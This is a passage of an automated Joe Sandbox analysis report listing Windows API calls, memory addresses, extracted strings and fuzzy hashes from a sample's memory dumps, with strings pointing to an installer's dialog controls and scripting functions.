                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftollstrlen
                                                                                                                • String ID: 0:R$D$DefaultErrorMode$ErrorCode$ErrorMsg$NewConsole$NewProcessGroup$SeparateWOWVDM$Suspended$UnicodeEnvironment
                                                                                                                • API String ID: 2052632373-2322229317
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: A bad pointer has been used.$Advapi32.dll$CreateProcessWithLogonW
                                                                                                                • API String ID: 3519838083-4276160095
                                                                                                                • Opcode ID: da6c3510daa39f07ea12006a9770c9fe477a7265a20e9356a9af3762068283a1
                                                                                                                • Instruction ID: b1d0f99e43904c2a0832fa948a07cdff5dcb46890749a114e5afd31a54da981c
                                                                                                                • Opcode Fuzzy Hash: da6c3510daa39f07ea12006a9770c9fe477a7265a20e9356a9af3762068283a1
                                                                                                                • Instruction Fuzzy Hash: BAA17E74900219EFCF15DFA5C845BEEBBB9AF84304F14412EF112A6291DB789A80CB68
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004548A8
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454931
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 00454949
                                                                                                                • SendMessageA.USER32(?,00000187,?,00000000), ref: 00454963
                                                                                                                  • Part of subcall function 0045C50B: __EH_prolog.LIBCMT ref: 0045C510
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454987
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 0045499F
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                • SendMessageA.USER32(?,00000187,?,00000000), ref: 004549B9
                                                                                                                  • Part of subcall function 0045C45C: __EH_prolog.LIBCMT ref: 0045C461
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$Windowlstrlen
                                                                                                                • String ID: Checked$Index$Selected$Text$false$true
                                                                                                                • API String ID: 2526461855-4262960588
                                                                                                                • Opcode ID: 392699d910bf1621188656a7b0aebc387bf76bbe049c96ba87718edf53aa44ee
                                                                                                                • Instruction ID: fb5b4e533497bf84aaa86c42b6e575238de286fac3f874d3a72acc2ad7edaa55
                                                                                                                • Opcode Fuzzy Hash: 392699d910bf1621188656a7b0aebc387bf76bbe049c96ba87718edf53aa44ee
                                                                                                                • Instruction Fuzzy Hash: 6691F734500644ABDB05EB76CC56FAEBBA4AF80318F10812EB4159B2D2DB78AE45CB59
                                                                                                                APIs
                                                                                                                • __ftol.LIBCMT ref: 004847E7
                                                                                                                  • Part of subcall function 004B1FCA: GetLocalTime.KERNEL32(00000000), ref: 004B1FD7
                                                                                                                  • Part of subcall function 004B1FCA: GetSystemTime.KERNEL32(?), ref: 004B1FE1
                                                                                                                • _wctomb_s.LIBCMT ref: 00484918
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$LocalSystem__ftol_wctomb_s
                                                                                                                • String ID: `date' format too long$day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                • API String ID: 667603400-2335568655
                                                                                                                • Opcode ID: 2c0e3f41a8b273ede04ff5c4ba41b961c0be07776424e337bcd465269f9b073f
                                                                                                                • Instruction ID: 5937b14468f23390398eff1e5af1769c89a76d4be87a49388897db95451fadbb
                                                                                                                • Opcode Fuzzy Hash: 2c0e3f41a8b273ede04ff5c4ba41b961c0be07776424e337bcd465269f9b073f
                                                                                                                • Instruction Fuzzy Hash: 1341BEF16402053BF620FA75ECC3EEF765CEBC0714F00491EF99556282EABEA94143A9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00440A45
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 00440AB1
                                                                                                                • __ftol.LIBCMT ref: 00440AE6
                                                                                                                • __ftol.LIBCMT ref: 00440B1B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol
                                                                                                                • String ID: 0:R$P$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                                                • API String ID: 2123048387-3909543088
                                                                                                                • Opcode ID: 9e246c428cab53e047da452639eec7834628c60a719ab49924a4789e6ef9a572
                                                                                                                • Instruction ID: c5f0b79ad7f6abfd01c2bea4fda5df8cf40422b8ff3bbb9905142f2ac86fd7e8
                                                                                                                • Opcode Fuzzy Hash: 9e246c428cab53e047da452639eec7834628c60a719ab49924a4789e6ef9a572
                                                                                                                • Instruction Fuzzy Hash: 87D1E335908205A9FB08B7A6DC52FFE76389F12728F20051FF601B51D2EF7C5A52962E
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046C4FD
                                                                                                                  • Part of subcall function 004688E5: __EH_prolog.LIBCMT ref: 004688EA
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                                                Strings
                                                                                                                • IDS_CTRL_RADIOBTN_PERUSER, xrefs: 0046C590
                                                                                                                • Make shortcuts available to all users, xrefs: 0046C5AC
                                                                                                                • IDS_CTRL_COMBOBOX_SHORTCUTFOLDERS, xrefs: 0046C5F6
                                                                                                                • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 0046C52A
                                                                                                                • IDS_CTRL_RADIOBTN_ALLUSERS, xrefs: 0046C5C3
                                                                                                                • Shortcut Folder:, xrefs: 0046C546
                                                                                                                • IDS_CTRL_STATICTEXT_LABEL_01, xrefs: 0046C55D
                                                                                                                • %AppShortcutFolderName%, xrefs: 0046C5DF
                                                                                                                • Install shortcuts for current user only, xrefs: 0046C579
                                                                                                                • The shortcut icons will be created in the folder indicated below. If you don't want to use the default folder, you can either type a new name, or select an existing folder from the list., xrefs: 0046C516
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: %AppShortcutFolderName%$IDS_CTRL_COMBOBOX_SHORTCUTFOLDERS$IDS_CTRL_RADIOBTN_ALLUSERS$IDS_CTRL_RADIOBTN_PERUSER$IDS_CTRL_STATICTEXT_LABEL_01$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS$Install shortcuts for current user only$Make shortcuts available to all users$Shortcut Folder:$The shortcut icons will be created in the folder indicated below. If you don't want to use the default folder, you can either type a new name, or select an existing folder from the list.
                                                                                                                • API String ID: 3243491680-1364183510
                                                                                                                • Opcode ID: a6b6c61d03f4ca76ea35b15e6d5ae3995b9d42fa2eb3fc4842eee1967b6da1d6
                                                                                                                • Instruction ID: ccb8799adeed2a51f35749a3196474a1a389b5bf558dac29c4efb1e1255f382f
                                                                                                                • Opcode Fuzzy Hash: a6b6c61d03f4ca76ea35b15e6d5ae3995b9d42fa2eb3fc4842eee1967b6da1d6
                                                                                                                • Instruction Fuzzy Hash: 8D318BB4625709B7DB08BB5AC907ADE7EB4AF45B64F10420EF011632D2CB75174085EB
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?), ref: 004A099D
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004A09C3
                                                                                                                  • Part of subcall function 004A1F10: TlsGetValue.KERNEL32(0000001C,?,00000000,?,00000000,004A0AEA,00000065,00000000,00000104), ref: 004A1F1A
                                                                                                                  • Part of subcall function 004A1F10: lstrcpy.KERNEL32(00000000,00523A30), ref: 004A1F3E
                                                                                                                • lstrcpyn.KERNEL32(?,00000000,?,00000104), ref: 004A09E3
                                                                                                                • lstrcat.KERNEL32(?,00510870), ref: 004A0A04
                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004A0A13
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,00000104), ref: 004A0A2C
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000318,00000000,?,00000104), ref: 004A0A42
                                                                                                                • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000,?,00000104), ref: 004A0A5D
                                                                                                                • lstrlen.KERNEL32(?,?,00000000,?,00000104), ref: 004A0A6E
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000104), ref: 004A0A77
                                                                                                                • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000,?,00000104), ref: 004A0A88
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000104), ref: 004A0A8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Write$Valuelstrcat$CloseCreateDirectoryHandlePointerWindowslstrcpylstrcpynlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3960242371-0
                                                                                                                • Opcode ID: b0bd460c93b43f10fbb35235c7ed9f2e226f1bf64a41e7597b5cd37ac4d247b2
                                                                                                                • Instruction ID: b0b316e7fcd3fa58e7816bf0b84c32f351f63135d6f55a482bb6d2f4a839117b
                                                                                                                • Opcode Fuzzy Hash: b0bd460c93b43f10fbb35235c7ed9f2e226f1bf64a41e7597b5cd37ac4d247b2
                                                                                                                • Instruction Fuzzy Hash: 79213B752403457FE220DB50DC8AFEB776CEB94B50F018928F754AA1D1D7B464058BA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00434A13
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                • __ftol.LIBCMT ref: 00434BEF
                                                                                                                • __ftol.LIBCMT ref: 00434C16
                                                                                                                • __ftol.LIBCMT ref: 00434DA9
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                • __ftol.LIBCMT ref: 00434D1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$Interlocked$Incrementlstrlen$Decrement
                                                                                                                • String ID: 0:R$alt$ctrl$keycode$shift
                                                                                                                • API String ID: 36383070-2511585862
                                                                                                                • Opcode ID: b70884661b55cc2d7b81174ba8f50059e744217bffcd78c1cbbb3a722b64ca41
                                                                                                                • Instruction ID: 76aa5a0cd1dc19bebe1d2a2a5deef0c92b4fbf5ac2c7ee51af8cfdb5c8aaeb48
                                                                                                                • Opcode Fuzzy Hash: b70884661b55cc2d7b81174ba8f50059e744217bffcd78c1cbbb3a722b64ca41
                                                                                                                • Instruction Fuzzy Hash: D0E1D539805248BDEB09FBA5D846FEE7BA89F15318F20401FF501761C2EF7C6B858669
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004403A3
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • __ftol.LIBCMT ref: 00440435
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                • __ftol.LIBCMT ref: 0044045C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked__ftol$DecrementIncrementlstrlen
                                                                                                                • String ID: 0:R$P$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                                                • API String ID: 439246406-3909543088
                                                                                                                • Opcode ID: 07bca6b5a83fba1956f643b9bd73657a45c9388a111a1786a1189b6ba1285219
                                                                                                                • Instruction ID: bd03b0adc0f9ea16d523466af6f3f46c9776e3ac3697456ec47dd83fc5c531b1
                                                                                                                • Opcode Fuzzy Hash: 07bca6b5a83fba1956f643b9bd73657a45c9388a111a1786a1189b6ba1285219
                                                                                                                • Instruction Fuzzy Hash: 73B17D75805619A9EB09FBA6DC42FEE7B689F26318F10005FF501B21C2EF7C1B46866D
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004201E6
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 0042020C
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                • __ftol.LIBCMT ref: 00420381
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • IsWindow.USER32(?), ref: 004203AA
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001), ref: 004203C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$DecrementInterlockedInvalidateRectWindow
                                                                                                                • String ID: Enabled$Selected$Sorted$Text$Visible
                                                                                                                • API String ID: 3448736364-2696731559
                                                                                                                • Opcode ID: 149af4aec8e82252b51daaf9a8c46e4ff84464dcf3dc9c1619b6064ec9e3169a
                                                                                                                • Instruction ID: 7eb0b97744bd8fdcfe71428d0a1babc3e647d09180e7fb14c7feff6e49657f8d
                                                                                                                • Opcode Fuzzy Hash: 149af4aec8e82252b51daaf9a8c46e4ff84464dcf3dc9c1619b6064ec9e3169a
                                                                                                                • Instruction Fuzzy Hash: 1051E5316095257ADA05B7269C42EEE329E9F46334F20070FF431B62E3EF6C564243AE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00420044
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420070
                                                                                                                  • Part of subcall function 004515F6: __EH_prolog.LIBCMT ref: 004515FB
                                                                                                                  • Part of subcall function 004515F6: IsWindow.USER32(?), ref: 00451629
                                                                                                                  • Part of subcall function 004515F6: SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0045164B
                                                                                                                  • Part of subcall function 004515F6: SendMessageA.USER32(?,00000149,00000000,00000000), ref: 00451662
                                                                                                                  • Part of subcall function 004515F6: SendMessageA.USER32(?,00000148,00000000,00000000), ref: 0045167F
                                                                                                                  • Part of subcall function 004519D9: SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004519FB
                                                                                                                • IsWindow.USER32(?), ref: 004200CD
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004200E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$Window$__ftol
                                                                                                                • String ID: Enabled$ItemCount$Selected$Sorted$Text$Visible
                                                                                                                • API String ID: 4272088191-211786709
                                                                                                                • Opcode ID: f974b0529d35a33abd1e791975ba957fcacf6b0ae9d2213bbd83debd46b2a923
                                                                                                                • Instruction ID: 194c7facc02b451eb1ef1c94f618bb1664aefb20aab39796094a26b7080ab279
                                                                                                                • Opcode Fuzzy Hash: f974b0529d35a33abd1e791975ba957fcacf6b0ae9d2213bbd83debd46b2a923
                                                                                                                • Instruction Fuzzy Hash: 5D41B371901524BACB01BBA69C42EDF7A6DEF85388F04041FF411A2162DB3D5653C7BE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004606F6
                                                                                                                • IsWindow.USER32(?), ref: 0046072C
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000001), ref: 0046074B
                                                                                                                • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004607FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologItemMessageNextSendWindow
                                                                                                                • String ID: &$Checked$false$noD$tTQ$true
                                                                                                                • API String ID: 3580624722-1106302426
                                                                                                                • Opcode ID: dca2a365dddfc61ed5e354935dca3ac59a44743440ff9d5626e72be7573642af
                                                                                                                • Instruction ID: 28ff760f15f42cd65ef503e641e3190d86d982c4781f83b21768024c4cc5f26e
                                                                                                                • Opcode Fuzzy Hash: dca2a365dddfc61ed5e354935dca3ac59a44743440ff9d5626e72be7573642af
                                                                                                                • Instruction Fuzzy Hash: D341B030600701AFDB55EF75C884B6ABBA0FF04754F14812EF4159B292EBB8ED41CB99
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004689DB
                                                                                                                • GetSystemMetrics.USER32(00000006), ref: 00468A73
                                                                                                                • GetSystemMetrics.USER32(00000006), ref: 00468AEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$H_prolog
                                                                                                                • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                                                • API String ID: 2939012833-2679619293
                                                                                                                • Opcode ID: f80d64fba93162bef99e389bc0197450a3df3037497501e8d862b8afc100e3bf
                                                                                                                • Instruction ID: 612bf3bb3a1a5bad5035dd40488528eb03de75a8191c976b0f81d4a9463d381d
                                                                                                                • Opcode Fuzzy Hash: f80d64fba93162bef99e389bc0197450a3df3037497501e8d862b8afc100e3bf
                                                                                                                • Instruction Fuzzy Hash: 4F7140B1910219ABCF14DFA5DD56FEF7BB9AF44704F00412EF405B6282DB74A904CBAA
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004688EA
                                                                                                                  • Part of subcall function 0045FDEB: __EH_prolog.LIBCMT ref: 0045FDF0
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
